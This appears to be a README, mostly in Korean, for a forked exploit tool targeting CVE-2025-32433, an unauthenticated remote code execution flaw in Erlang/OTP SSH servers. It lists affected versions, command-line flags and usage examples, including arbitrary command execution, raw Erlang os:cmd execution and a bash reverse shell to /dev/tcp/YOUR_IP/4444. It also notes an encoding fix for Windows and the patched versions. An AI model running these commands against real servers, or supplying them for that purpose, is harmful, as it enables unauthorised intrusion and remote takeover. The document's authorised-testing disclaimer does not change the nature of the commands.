
Based on the original version:https://github.com/vulhub/vulhub/blob/master/erlang/CVE-2025-32433/exploit.py Replace Unicode checkmark with ASCII character for Windows compatibility
Erlang/OTP SSH 인증되지 않은 원격 코드 실행
이 저장소는 Erlang/OTP SSH 서버의 심각한 인증되지 않은 원격 코드 실행 취약점인 CVE-2025-32433에 대한 익스플로잇을 포함합니다.
주요 기능:
CVE ID: CVE-2025-32433
심각도: 치명적
영향: 인증되지 않은 원격 코드 실행
이 취약점은 공격자가 특수하게 조작된 SSH 프로토콜 메시지를 전송하여 인증 없이 Erlang/OTP SSH 서버에서 임의의 시스템 명령을 실행할 수 있도록 합니다.
OTP ≤ 27.3.2
OTP ≤ 26.2.5.10
OTP ≤ 25.3.2.19
OTP ≥ 17.0 and older (likely)
# Basic command execution
python exploit.py -t <target-ip> -p 2222 -c "whoami"
# Execute system command
python exploit.py -t 192.168.1.100 -p 2222 -c "touch /tmp/pwned"
# Raw Erlang code execution
python exploit.py -t 192.168.1.100 -p 2222 -e 'os:cmd("id").'
# Reverse shell
python exploit.py -t 192.168.1.100 -p 2222 -c "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"
-t, --target Target IP address (default: 127.0.0.1)
-p, --port Target port (default: 2222)
-c, --command System command to execute
-e, --erlang Raw Erlang code to execute
이 버전은 원래 익스플로잇에 존재하는 인코딩 문제를 수정합니다.
문제: 원래 익스플로잇은 유니코드 체크마크 문자(✓, U+2713)를 사용하여 Windows에서 GBK 인코딩 오류를 발생시킵니다:
'gbk' codec can't encode character '✓' in position 1: illegal multibyte sequence
해결책: 교차 플랫폼 호환성을 위해 유니코드 문자를 표준 ASCII + 문자로 대체했습니다.
익스플로잇은 다음과 같이 작동합니다:
os:cmd()를 통해 임의의 Erlang 코드 실행- OTP 27.3.3
- OTP 26.2.5.11
- OTP 25.3.2.20
이 익스플로잇은 교육 및 승인된 보안 테스트 목적으로만 제공됩니다. 컴퓨터 시스템에 대한 무단 접근은 불법입니다. 책임감 있게 사용하고 명시적 허가를 받은 시스템에서만 테스트하십시오.
MIT 라이선스
chuzouX가 Windows 호환성을 위해 수정함